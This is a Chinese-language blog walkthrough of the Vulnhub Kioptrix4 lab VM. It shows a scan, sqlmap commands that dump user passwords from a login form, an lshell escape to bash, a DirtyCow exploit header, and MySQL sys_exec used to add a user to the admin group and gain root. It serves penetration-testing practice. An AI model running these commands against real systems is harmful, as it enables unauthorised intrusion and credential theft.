天道酬勤

【Vulnhub】— Kioptrix4

一、主机发现

使用netdiscover,发现其IP为192.168.203.136

二、端口扫描

root@kali:~# nmap -sV -A 192.168.203.136 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 10:43 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.136
Host is up (0.00050s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	CVE-2010-4478	7.5	https://vulners.com/cve/CVE-2010-4478
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	CVE-2010-4755	4.0	https://vulners.com/cve/CVE-2010-4755
|_    	CVE-2008-5161	2.6	https://vulners.com/cve/CVE-2008-5161
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.136:80/
|     Form id: myusername
|     Form action: checklogin.php
|     
|     Path: http://192.168.203.136:80/checklogin.php
|     Form id: 
|     Form action: index.php
|     
|     Path: http://192.168.203.136:80/index.php
|     Form id: myusername
|_    Form action: checklogin.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /database.sql: Possible database backup
|   /icons/: Potentially interesting folder w/ directory listing
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /index/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.2.8: 
|     	CVE-2010-0425	10.0	https://vulners.com/cve/CVE-2010-0425
|     	CVE-2011-3192	7.8	https://vulners.com/cve/CVE-2011-3192
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2013-2249	7.5	https://vulners.com/cve/CVE-2013-2249
|     	CVE-2009-1891	7.1	https://vulners.com/cve/CVE-2009-1891
|     	CVE-2009-1890	7.1	https://vulners.com/cve/CVE-2009-1890
|     	CVE-2012-0883	6.9	https://vulners.com/cve/CVE-2012-0883
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2013-1862	5.1	https://vulners.com/cve/CVE-2013-1862
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2011-3368	5.0	https://vulners.com/cve/CVE-2011-3368
|     	CVE-2010-1452	5.0	https://vulners.com/cve/CVE-2010-1452
|     	CVE-2010-0408	5.0	https://vulners.com/cve/CVE-2010-0408
|     	CVE-2009-2699	5.0	https://vulners.com/cve/CVE-2009-2699
|     	CVE-2008-2364	5.0	https://vulners.com/cve/CVE-2008-2364
|     	CVE-2007-6750	5.0	https://vulners.com/cve/CVE-2007-6750
|     	CVE-2009-1195	4.9	https://vulners.com/cve/CVE-2009-1195
|     	CVE-2012-0031	4.6	https://vulners.com/cve/CVE-2012-0031
|     	CVE-2011-3607	4.4	https://vulners.com/cve/CVE-2011-3607
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	CVE-2012-4558	4.3	https://vulners.com/cve/CVE-2012-4558
|     	CVE-2012-3499	4.3	https://vulners.com/cve/CVE-2012-3499
|     	CVE-2012-0053	4.3	https://vulners.com/cve/CVE-2012-0053
|     	CVE-2011-4317	4.3	https://vulners.com/cve/CVE-2011-4317
|     	CVE-2011-3639	4.3	https://vulners.com/cve/CVE-2011-3639
|     	CVE-2011-3348	4.3	https://vulners.com/cve/CVE-2011-3348
|     	CVE-2011-0419	4.3	https://vulners.com/cve/CVE-2011-0419
|     	CVE-2010-0434	4.3	https://vulners.com/cve/CVE-2010-0434
|     	CVE-2008-2939	4.3	https://vulners.com/cve/CVE-2008-2939
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|     	CVE-2012-2687	2.6	https://vulners.com/cve/CVE-2012-2687
|_    	CVE-2011-4415	1.2	https://vulners.com/cve/CVE-2011-4415
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:30:77:6D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.203.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 361.54 seconds

目标开放了22、80、139以及445端口,并且我们还扫到了一个database.sql文件,可能是数据库备份文件。

三、漏洞寻找

我们先查看web服务:

不着急,我们先看一下刚才发现的database.sql

得到一个账号和密码,但是无法登录。

那就换个思路,这个靶机给的提示呢,是存在sql注入的,显而易见,我们去试一下登陆框。

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword --dbs

果然是存在注入的:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members --tables
-------------------------------------------------------------------------
Database: members
[1 table]
+---------+
| members |
+---------+

继续查看members表,爆破此表时,利用的是盲注:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members --columns
---------------------------------------------------------------------------
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

接下来继续获得列表详细信息:

sqlmap -u http://192.168.203.136/checklogin.php --data "myusername=123123&mypassword=123123&Submit=Login" -p mypassword -D members -T members -C username,password --dump
-----------------------------------------------------------------------
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+

四、登录ssh

我们利用得到的账号和密码尝试连接ssh。

使用账号robert,成功登录,但是登陆上去发现,什么也执行不了,限制了shell的使用,而且不是rbash。去网上查了一下特征,感觉像是lshell。

这里我们可以使用此命令进行绕过:

echo os.system('/bin/bash')

切换到/root目录下,看到了lshell的存在,证明了猜想:

关于lshell的文章:https://blog.csdn.net/savior141/article/details/71305002


我也是比较奇怪,我还没提权呢,怎么都可以进入/root目录下,并且还看了flag:

五、提权

查看了一下linux的内核,是可以用脏牛提权的:

robert@Kioptrix4:/root$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
robert@Kioptrix4:/root$ getconf LONG_BIT
32

漏洞范围

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)

利用searchsploit找到提权脚本:

searchsploit dirty -m exploits/linux/local/40839.c
---------------------------------------------------------------
root@kali:~# cat 40839.c
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at

但是每当我要从靶机使用wget去下载提权脚本的时候,总不成功,大概是做了防火墙限制吧。

我还没想到一个完美的解决办法 ,附上脏牛提权文章:https://www.jianshu.com/p/df72d1ee1e3e


这个靶机的重点其实是mysql提权:

我们在网站的根目下找到了记录数据库账号和密码的文件:

robert@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

看到,我们无需密码就可以登录。

mysql提权

select sys_exec("usermod -aG admin robert")  //直接将robert加入管理员组
robert@Kioptrix4:/var/www$ mysql -u root -p   
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6545
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec("usermod -aG admin robert");
+--------------------------------------+
| sys_exec("usermod -aG admin robert") |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.00 sec)

之后退出mysql:

robert@Kioptrix4:/var/www$ sudo su root    
[sudo] password for robert: 
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

提权成功!

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】— Kioptrix4
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏